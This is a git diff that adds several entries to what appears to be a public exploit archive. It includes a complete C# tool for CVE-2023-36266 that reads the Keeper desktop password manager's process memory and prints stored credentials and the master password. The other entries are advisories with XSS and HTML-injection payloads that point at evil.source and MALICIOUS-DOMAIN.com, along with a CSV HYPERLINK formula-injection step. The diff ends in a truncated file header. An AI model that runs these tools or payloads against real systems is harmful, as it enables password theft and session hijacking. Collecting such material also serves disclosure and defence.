diff --git a/exploits/multiple/local/51623.cs b/exploits/multiple/local/51623.cs
new file mode 100644
index 000000000..85111030d
--- /dev/null
+++ b/exploits/multiple/local/51623.cs
@@ -0,0 +1,209 @@
+# Exploit Title: Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping
+# Google Dork: NA
+# Date: 22-07-2023
+# Exploit Author: H4rk3nz0
+# Vendor Homepage: https://www.keepersecurity.com/en_GB/
+# Software Link: https://www.keepersecurity.com/en_GB/get-keeper.html
+# Version: Desktop App version 16.10.2 & Browser Extension version 16.5.4
+# Tested on: Windows
+# CVE : CVE-2023-36266
+
+using System;
+using System.Management;
+using System.Diagnostics;
+using System.Linq;
+using System.Runtime.InteropServices;
+using System.Text;
+using System.Text.RegularExpressions;
+using System.Collections.Generic;
+
+// Keeper Security Password vault Desktop application and Browser Extension stores credentials in plain text in memory
+// This can persist after logout if the user has not explicitly enabled the option to 'clear process memory'
+// As a result of this one can extract credentials & master password from a victim after achieving low priv access
+// This does NOT target or extract credentials from the affected browser extension (yet), only the Windows desktop app.
+// Github: https://github.com/H4rk3nz0/Peeper
+
+static class Program
+{
+    // To make sure we are targetting the right child process - check command line
+    public static string GetCommandLine(this Process process)
+    {
+        if (process is null || process.Id < 1)
+        {
+            return "";
+        }
+        string query = $@"SELECT CommandLine FROM Win32_Process WHERE ProcessId = {process.Id}";
+        using (var searcher = new ManagementObjectSearcher(query))
+        using (var collection = searcher.Get())
+        {
+            var managementObject = collection.OfType<ManagementObject>().FirstOrDefault();
+            return managementObject != null ? (string)managementObject["CommandLine"] : "";
+        }
+    }
+
+    //Extract plain text credential JSON strings (regex inelegant but fast)
+    public static void extract_credentials(string text)
+    {
+        int index = text.IndexOf("{\"title\":\"");
+        int eindex = text.IndexOf("}");
+        while (index >= 0)
+        {
+            try
+            {
+                int endIndex = Math.Min(index + eindex, text.Length);
+                Regex reg = new Regex("(\\{\\\"title\\\"[ -~]+\\}(?=\\s))");
+                string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
+
+                int match_cut = match.IndexOf("}  ");
+                if (match_cut != -1 )
+                {
+                    match = match.Substring(0, match_cut + "}  ".Length).TrimEnd();
+                    if (!stringsList.Contains(match) && match.Length > 20)
+                    {
+                        Console.WriteLine("->Credential Record Found : " + match.Substring(0, match_cut + "}  ".Length) + "\n");
+                        stringsList.Add(match);
+                    }
+
+                } else if (!stringsList.Contains(match.TrimEnd()) && match.Length > 20)
+                {
+                    Console.WriteLine("->Credential Record Found : " + match + "\n");
+                    stringsList.Add(match.TrimEnd());
+                }
+                index = text.IndexOf("{\"title\":\"", index + 1);
+                eindex = text.IndexOf("}", eindex + 1);
+            }
+            catch
+            {
+                return;
+            }
+
+        }
+    }
+
+    // extract account/email containing JSON string
+    public static void extract_account(string text)
+    {
+        int index = text.IndexOf("{\"expiry\"");
+        int eindex = text.IndexOf("}");
+        while (index >= 0)
+        {
+            try
+            {
+                int endIndex = Math.Min(index + eindex, text.Length);
+                Regex reg = new Regex("(\\{\\\"expiry\\\"[ -~]+@[ -~]+(?=\\}).)");
+                string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
+                if ((match.Length > 2))
+                {
+                    Console.WriteLine("->Account Record Found : " + match + "\n");
+                    return;
+                }
+                index = text.IndexOf("{\"expiry\"", index + 1);
+                eindex = text.IndexOf("}", eindex + 1);
+            }
+            catch
+            {
+                return;
+            }
+        }
+
+    }
+
+    // Master password not available with SSO based logins but worth looking for.
+    // Disregard other data key entries that seem to match: _not_master_key_example
+    public static void extract_master(string text)
+    {
+        int index = text.IndexOf("data_key");
+        int eindex = index + 64;
+        while (index >= 0)
+        {
+            try
+            {
+                int endIndex = Math.Min(index + eindex, text.Length);
+                Regex reg = new Regex("(data_key[ -~]+)");
+                var match_one = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
+                Regex clean = new Regex("(_[a-zA-z]{1,14}_[a-zA-Z]{1,10})");
+                if (match_one.Replace("data_key", "").Length > 5)
+                {
+                    if (!clean.IsMatch(match_one.Replace("data_key", "")))
+                    {
+                        Console.WriteLine("->Master Password : " + match_one.Replace("data_key", "") + "\n");
+                    }
+
+                }
+                index = text.IndexOf("data_key", index + 1);
+                eindex = index + 64;
+            }
+            catch
+            {
+                return;
+            }
+
+        }
+    }
+
+    // Store extracted strings and comapre
+    public static List<string> stringsList = new List<string>();
+
+    // Main function, iterates over private committed memory pages, reads memory and performs regex against the pages UTF-8
+    // Performs OpenProcess to get handle with necessary query permissions
+    static void Main(string[] args)
+    {
+        foreach (var process in Process.GetProcessesByName("keeperpasswordmanager"))
+        {
+            string commandline = GetCommandLine(process);
+            if (commandline.Contains("--renderer-client-id=5") || commandline.Contains("--renderer-client-id=7"))
+            {
+                Console.WriteLine("->Keeper Target PID Found: {0}", process.Id.ToString());
+                Console.WriteLine("->Searching...\n");
+                IntPtr processHandle = OpenProcess(0x00000400 | 0x00000010, false, process.Id);
+                IntPtr address = new IntPtr(0x10000000000);
+                MEMORY_BASIC_INFORMATION memInfo = new MEMORY_BASIC_INFORMATION();
+                while (VirtualQueryEx(processHandle, address, out memInfo, (uint)Marshal.SizeOf(memInfo)) != 0)
+                {
+                    if (memInfo.State == 0x00001000 && memInfo.Type == 0x20000)
+                    {
+                        byte[] buffer = new byte[(int)memInfo.RegionSize];
+                        if (NtReadVirtualMemory(processHandle, memInfo.BaseAddress, buffer, (uint)memInfo.RegionSize, IntPtr.Zero) == 0x0)
+                        {
+                            string text = Encoding.ASCII.GetString(buffer);
+                            extract_credentials(text);
+                            extract_master(text);
+                            extract_account(text);
+                        }
+                    }
+
+                    address = new IntPtr(memInfo.BaseAddress.ToInt64() + memInfo.RegionSize.ToInt64());
+                }
+
+                CloseHandle(processHandle);
+
+            }
+
+        }
+
+    }
+
+    [DllImport("kernel32.dll")]
+    public static extern IntPtr OpenProcess(uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, int dwProcessId);
+
+    [DllImport("kernel32.dll")]
+    public static extern bool CloseHandle(IntPtr hObject);
+
+    [DllImport("ntdll.dll")]
+    public static extern uint NtReadVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] Buffer, UInt32 NumberOfBytesToRead, IntPtr NumberOfBytesRead);
+
+    [DllImport("kernel32.dll", SetLastError = true)]
+    public static extern int VirtualQueryEx(IntPtr hProcess, IntPtr lpAddress, out MEMORY_BASIC_INFORMATION lpBuffer, uint dwLength);
+
+    [StructLayout(LayoutKind.Sequential)]
+    public struct MEMORY_BASIC_INFORMATION
+    {
+        public IntPtr BaseAddress;
+        public IntPtr AllocationBase;
+        public uint AllocationProtect;
+        public IntPtr RegionSize;
+        public uint State;
+        public uint Protect;
+        public uint Type;
+    }
+}
\ No newline at end of file
diff --git a/exploits/php/webapps/51613.txt b/exploits/php/webapps/51613.txt
new file mode 100644
index 000000000..ba4144878
--- /dev/null
+++ b/exploits/php/webapps/51613.txt
@@ -0,0 +1,174 @@
+# Exploit Title: Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities
+References (Source): https://www.vulnerability-lab.com/get_content.php?id=2278
+Release Date:
+2023-07-04
+Vulnerability Laboratory ID (VL-ID): 2278
+
+Common Vulnerability Scoring System: 5.4
+
+Product & Service Introduction:
+===============================
+https://codecanyon.net/item/active-super-shop-multivendor-cms/12124432
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple html injection vulnerabilities in the Active Super Shop Multi-vendor CMS v2.5 web-application.
+
+
+Affected Product(s):
+====================
+ActiveITzone
+Product: Active Super Shop CMS v2.5 (CMS) (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2021-08-20: Researcher Notification & Coordination (Security Researcher)
+2021-08-21: Vendor Notification (Security Department)
+2021-**-**: Vendor Response/Feedback (Security Department)
+2021-**-**: Vendor Fix/Patch (Service Developer Team)
+2021-**-**: Security Acknowledgements (Security Department)
+2023-07-05: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted Authentication (User Privileges)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Responsible Disclosure
+
+
+Technical Details & Description:
+================================
+Multiple html injection web vulnerabilities has been discovered in the official Active Super Shop Multi-vendor CMS v2.5 web-application.
+The web vulnerability allows remote attackers to inject own html codes with persistent vector to manipulate application content.
+
+The persistent html injection web vulnerabilities are located in the name, phone and address parameters of the manage profile and products branding module.
+Remote attackers with privileged accountant access are able to inject own malicious script code in the name parameter to provoke a persistent execution on
+profile view or products preview listing. There are 3 different privileges that are allowed to access the backend like the accountant (low privileges), the
+manager (medium privileges) or the admin (high privileges). Accountants are able to attack the higher privileged access roles of admins and manager on preview
+of the elements in the backend to compromise the application. The request method to inject is post and the attack vector is persistent located on the application-side.
+
+Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and
+persistent manipulation of affected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Manage Details
+
+Vulnerable Parameter(s):
+[+] name
+[+] phone
+[+] address
+
+Affected Module(s):
+[+] manage profile
+[+] products branding
+
+
+Proof of Concept (PoC):
+=======================
+The html injection web vulnerabilities can be exploited by remote attackers with privileged accountant access and with low user interaction.
+For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.
+
+
+Exploitation: Payload
+<img src="https://[DOMAIN]/[PATH]/[PICTURE].*">
+
+
+Vulnerable Source: manage_admin & branding
+<div class="tab-pane fade active in" id="" style="border:1px solid #ebebeb; border-radius:4px;">
+<div class="panel-heading">
+<h3 class="panel-title">Manage Details</h3>
+</div>
+<form action="https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/" class="form-horizontal" method="post" accept-charset="utf-8">
+<div class="panel-body">
+<div class="form-group">
+<label class="col-sm-3 control-label" for="demo-hor-1">Name</label>
+<div class="col-sm-6">
+<input type="text" name="name" value="Mr. Accountant"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-1" class="form-control required">
+</div></div>
+<div class="form-group">
+<label class="col-sm-3 control-label" for="demo-hor-2">Email</label>
+<div class="col-sm-6">
+<input type="email" name="email" value="accountant@shop.com" id="demo-hor-2" class="form-control required">
+</div></div>
+<div class="form-group">
+<label class="col-sm-3 control-label" for="demo-hor-3">
+Phone</label>
+<div class="col-sm-6">
+<input type="text" name="phone" value="017"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-3" class="form-control">
+</div></div>
+
+
+--- PoC Session Logs (POST) ---
+https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/
+Host: assm_cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: text/html, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------280242453224137385302547344680
+Content-Length: 902
+Origin:https://assm_cms.localhost:8080
+Connection: keep-alive
+Referer:https://assm_cms.localhost:8080/shop/admin/manage_admin/
+Cookie: ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; curr=1
+-
+POST: HTTP/3.0 200 OK
+content-type: text/html; charset=UTF-8
+ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; path=/; HttpOnly
+https://assm_cms.localhost:8080/shop/admin/manage_admin/
+Host: assm_cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+
+
+Reference(s):
+https://assm_cms.localhost:8080/shop/
+https://assm_cms.localhost:8080/shop/admin/
+https://assm_cms.localhost:8080/shop/admin/manage_admin/
+https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/
+
+
+Solution - Fix & Patch:
+=======================
+Disallow inseration of html code for input fields like name, adress and phone. Sanitize the content to secure deliver.
+
+
+Security Risk:
+==============
+The security risk of the html injection web vulnerabilities in the shopping web-application are estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
\ No newline at end of file
diff --git a/exploits/php/webapps/51614.txt b/exploits/php/webapps/51614.txt
new file mode 100644
index 000000000..8b844299a
--- /dev/null
+++ b/exploits/php/webapps/51614.txt
@@ -0,0 +1,144 @@
+Exploit Title: PaulPrinting CMS - (Search Delivery) Cross Site Scripting
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2286
+Release Date:
+=============
+2023-07-17
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2286
+Common Vulnerability Scoring System:
+====================================
+5.2
+Vulnerability Class:
+====================
+Cross Site Scripting - Non Persistent
+
+Product & Service Introduction:
+===============================
+PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface.
+
+(Copy of the Homepage:https://codecanyon.net/user/codepaul )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a non-persistent cross site vulnerability in the PaulPrinting (v2018) cms web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2022-08-25: Researcher Notification & Coordination (Security Researcher)
+2022-08-26: Vendor Notification (Security Department)
+2022-**-**: Vendor Response/Feedback (Security Department)
+2022-**-**: Vendor Fix/Patch (Service Developer Team)
+2022-**-**: Security Acknowledgements (Security Department)
+2023-07-17: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Open Authentication (Anonymous Privileges)
+
+
+User Interaction:
+=================
+Medium User Interaction
+
+
+Disclosure Type:
+================
+Responsible Disclosure
+
+
+Technical Details & Description:
+================================
+A client-side cross site scripting vulnerability has been discovered in the official PaulPrinting (v2018) cms web-application.
+Remote attackers are able to manipulate client-side requests by injection of malicious script code to compromise user session data.
+
+The client-side cross site scripting web vulnerability is located in the search input field with the insecure validated q parameter
+affecting the delivery module. Remote attackers are able to inject own malicious script code to the search input to provoke a client-side
+script code execution without secure encode. The request method to execute is GET and the attack vector is non-persistent.
+
+Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects
+to malicious source and non-persistent manipulation of affected application modules.
+
+
+Request Method(s):
+[+] GET
+
+Vulnerable Module(s):
+[+] /account/delivery
+
+Vulnerable Input(s):
+[+] Search
+
+Vulnerable Parameter(s):
+[+] q
+
+Affected Module(s):
+[+] /account/delivery
+[+] Delivery Contacts
+
+
+Proof of Concept (PoC):
+=======================
+The non-persistent xss web vulnerability can be exploited by remote attackers with low privileged user account and medium user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+PoC: Example
+https://codeawesome.in/printing/account/delivery?q=
+
+PoC: Exploitation
+https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)>
+
+
+--- PoC Session Logs (GET) ---
+https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)>
+Host: codeawesome.in
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Connection: keep-alive
+Cookie: member_login=1; member_id=123; session_id=25246428fe6e707a3be0e0ce54f0e5bf;
+-
+GET: HTTP/3.0 200 OK
+content-type: text/html; charset=UTF-8
+x-powered-by: PHP/7.1.33
+
+
+Vulnerable Source: (Search - delivery?q=)
+<div class="col-lg-8">
+<a href="https://codeawesome.in/printing/account/delivery" class="btn btn-primary mt-4 mb-2 float-right">
+<i class="fa fa-fw fa-plus"></i>
+</a>
+<form class="form-inline mt-4 mb-2" method="get">
+<div class="input-group mb-3 mr-2">
+<input type="text" class="form-control" name="q" value="a"><iframe src="evil.source" onload="alert(document.cookie)">">
+<div class="input-group-append">
+<button class="btn btn-outline-secondary" type="submit" id="button-addon2"><i class="fa fa-fw fa-search"></i></button>
+</div></div>
+
+
+Security Risk:
+==============
+The security risk of the cross site scripting web vulnerability with non-persistent attack vector is estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
\ No newline at end of file
diff --git a/exploits/php/webapps/51615.txt b/exploits/php/webapps/51615.txt
new file mode 100644
index 000000000..ee4adddc6
--- /dev/null
+++ b/exploits/php/webapps/51615.txt
@@ -0,0 +1,198 @@
+#Exploit Title: Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2317
+
+Release Date:
+=============
+2023-07-04
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2317
+
+Common Vulnerability Scoring System:
+====================================
+5.1
+
+Vulnerability Class:
+====================
+Multiple
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+Browse, download and stream individual files that are on your Android device, using a web browser via a WiFi connection.
+No more taking your phone apart to get the SD card out or grabbing your cable to access your camera pictures and copy across your favourite MP3s.
+
+(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.dooblou.WiFiFileExplorer )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple web vulnerabilities in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.
+
+Affected Product(s):
+====================
+Product Owner: dooblou
+Product: Dooblou WiFi File Explorer v1.13.3 - (Android) (Framework) (Wifi) (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2022-01-19: Researcher Notification & Coordination (Security Researcher)
+2022-01-20: Vendor Notification (Security Department)
+2022-**-**: Vendor Response/Feedback (Security Department)
+2022-**-**: Vendor Fix/Patch (Service Developer Team)
+2022-**-**: Security Acknowledgements (Security Department)
+2023-07-04: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted Authentication (Guest Privileges)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+Multiple input validation web vulnerabilities has been discovered in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.
+The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to web-application
+requests from the application-side.
+
+The vulnerabilities are located in the `search`, `order`, `download`, `mode` parameters. The requested content via get method request is insecure validated
+and executes malicious script codes. The attack vector is non-persistent and the rquest method to inject is get. Attacker do not need to be authorized to
+perform an attack to execute malicious script codes. The links can be included as malformed upload for example to provoke an execute bby a view of the
+front- & backend of the wifi explorer.
+
+Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious
+source and non-persistent manipulation of affected application modules.
+
+
+Proof of Concept (PoC):
+=======================
+The input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.
+For security demonstration or to reproduce the web vulnerabilities follow the provided information and steps below to continue.
+
+
+PoC: Exploitation
+http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK PATH TO RETURN INDEX</a>
+http://localhost:8000/storage/emulated/0/Download/?mode=31&search=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert%28document.domain%29%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX%3C%2Fa%3E&x=3&y=3
+http://localhost:8000/storage/emulated/0/Download/?mode=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3
+http://localhost:8000/storage/emulated/?order=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX
+
+
+Vulnerable Sources: Execution Points
+<table width="100%" cellspacing="0" cellpadding="16" border="0"><tbody><tr><td
+style="vertical-align:top;"><table style="background-color: #FFA81E;
+background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);
+background-repeat: repeat-x; background-position:top;" width="700"
+cellspacing="3" cellpadding="5" border="0"><tbody><tr><td><center><span
+class="doob_large_text">ERROR</span></center></td></tr></tbody></table><br><tabl
+e style="background-color: #B2B2B2; background-image:
+url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0">
+<tbody><tr><td><span class="doob_medium_text">Cannot find file or
+directory! /storage/emulated/0/Download/<a href="https://evil.source" onmouseover="alert(document.domain)"><br>PLEASE CLICK USER PATH TO RETURN
+INDEX</a></span></td></tr></tbody></table><br><span class="doob_medium_text"><span class="doob_link">&nbsp;&nbsp;<a
+href="/">>>&nbsp;Back To
+Files&nbsp;>></a></span></span><br></td></tr></tbody></table><br>
+-
+<li></li></ul></span></span></td></tr></tbody></table></div><div class="body row scroll-x scroll-y"><table width="100%" cellspacing="0" cellpadding="6" border="0"><tbody><tr>
+<td style="vertical-align:top;" width="100%"><form name="multiSelect" style="margin: 0px; padding: 0px;" action="/storage/emulated/0/Download/" enctype="multipart/form-data" method="POST">
+<input type="hidden" name="fileNames" value=""><table width="100%" cellspacing="0" cellpadding="1" border="0" bgcolor="#000000"><tbody><tr><td>
+<table width="100%" cellspacing="2" cellpadding="3" border="0" bgcolor="#FFFFFF"><tbody><tr style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);
+background-repeat: repeat-x; background-position:top;" height="30"><td colspan="5"><table width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td style="white-space:
+nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;</span></td><td style="white-space: nowrap;vertical-align:middle" align="right"><span class="doob_small_text_bold">
+&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=23&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a">
+<img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;
+<a href="?view=24&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a">
+<img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;
+<a href="?view=38&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN I
+-
+<td style="white-space: nowrap;vertical-align:middle"><input value="" type="checkbox" name="selectAll" onclick="setCheckAll();">&nbsp;&nbsp;<a class="doob_button"
+href="javascript:setMultiSelect('/storage/emulated/', 'action', '18&order=>" <<="">>"<a href="https://evil.source" onmouseover=alert(document.domain)">');javascript:document.multiSelect.submit();"
+style="">Download</a>&nbsp;<a class="doob_button" href="javascript:setMultiSelectConfirm('Are you sure you want to delete? This cannot be undone!', '/storage/emulated/', 'action',
+'13&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>');javascript:document.multiSelect.submit();" style="">Delete</a>&nbsp;
+<a class="doob_button" href='javascript:setMultiSelectPromptQuery("Create Copy",
+"/storage/emulated/", "/storage/emulated/", "action", "35&order=>"<<<a href="https://evil.source" onmouseover=alert(document.domain)>", "name");javascript:document.multiSelect.submit();'
+style="">Create Copy</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Zip</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Unzip</a></td>
+<td align="right" style="white-space: nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;&nbsp;&nbsp;&nbsp;<a href="javascript:showTreeview()"><img style="vertical-align:middle;border-style:
+none" src="/x99_dooblou_res/x99_dooblou_tree_dark.png" alt="img" title="Show Treeview"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;
+<a href="?view=23&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img"
+title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=24&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style:
+none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;
+<a href="?view=38&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_grid.png" alt="img"
+title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;</span></td></tr></table>
+
+
+---PoC Session Logs ---
+http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml
+Host: localhost:8000
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: */*
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Referer:http://localhost:8000/storage/emulated/0/Download/%3Ca%20href=%22https://evil.source%22%20onmouseover=alert(document.domain)%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E
+GET: HTTP/1.1 200 OK
+Cache-Control: no-cache
+Content-Type: text/xml
+-
+http://localhost:8000/storage/emulated/0/Download/?mode=<a+href%3D"https%3A%2F%2Fevil.source"+onmouseover%3Dalert(document.domain)><br>PLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3
+Host: localhost:8000
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Cookie: treeview=0
+Upgrade-Insecure-Requests: 1
+GET: HTTP/1.1 200 OK
+Cache-Control: no-store, no-cache, must-revalidate
+Content-Type: text/html
+-
+http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml
+Host: localhost:8000
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: */*
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Referer:http://localhost:8000/storage/emulated/0/Download/%<a href="https://evil.source" onmouseover=alert(document.domain)>%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E
+GET: HTTP/1.1 200 OK
+Cache-Control: no-cache
+Content-Type: text/xml
+
+
+Security Risk:
+==============
+The security risk of the multiple web vulnerabilities in the ios mobile wifi web-application are estimated as medium.
\ No newline at end of file
diff --git a/exploits/php/webapps/51622.txt b/exploits/php/webapps/51622.txt
new file mode 100644
index 000000000..cb2d92f84
--- /dev/null
+++ b/exploits/php/webapps/51622.txt
@@ -0,0 +1,37 @@
+# Exploit Title: RosarioSIS 10.8.4 - CSV Injection
+# Google Dork:NA
+# Exploit Author: Ranjeet Jaiswal#
+# Vendor Homepage: https://www.rosariosis.org/
+# Software Link: https://gitlab.com/francoisjacquet/rosariosis/-/archive/v10.8.4/rosariosis-v10.8.4.zip
+# Affected Version: 10.8.4
+# Category: WebApps
+# Tested on: Windows 10
+#
+#
+# 1. Vendor Description:
+#
+# RosarioSIS has been designed to address the most important needs of administrators, teachers, support staff, parents, students, and clerical   personnel. However, it also adds many components not typically found in Student Information Systems.
+#
+# 2. Technical Description:
+#
+# A CSV Injection (also known as Formula Injection) vulnerability in the RosarioSIS web application with version 10.8.4 allows malicious users to execute malicious payload in csv/xls and redirect authorized user to malicious website.
+
+#
+# 3. Proof Of Concept:
+
+ 3.1. Proof of Concept for CSV injection.
+
+# #Step to reproduce.
+Step1:Login in to RosarioSIS 10.8.4
+Step2:Go to Periods page
+Step3:Add CSV injection redirection payload such as "=HYPERLINK("https://www.google.com","imp")"in the Title field
+Step4:click on Save button to save data.
+Step5:Go to export tab and export the data
+Step6:When user open download Periods.xls file.You will see redirection hyperlink.
+Step7:When user click on link ,User will be redirected to Attacker or
+malicious website.
+
+
+
+# 4. Solution:
+ Upgrade to latest release of RosarioSIS.
\ No newline at end of file
diff --git a/exploits/php/webapps/51624.py b/exploits/php/webapps/51624.py
new file mode 100755
index 000000000..383eb376a
--- /dev/null
+++ b/exploits/php/webapps/51624.py
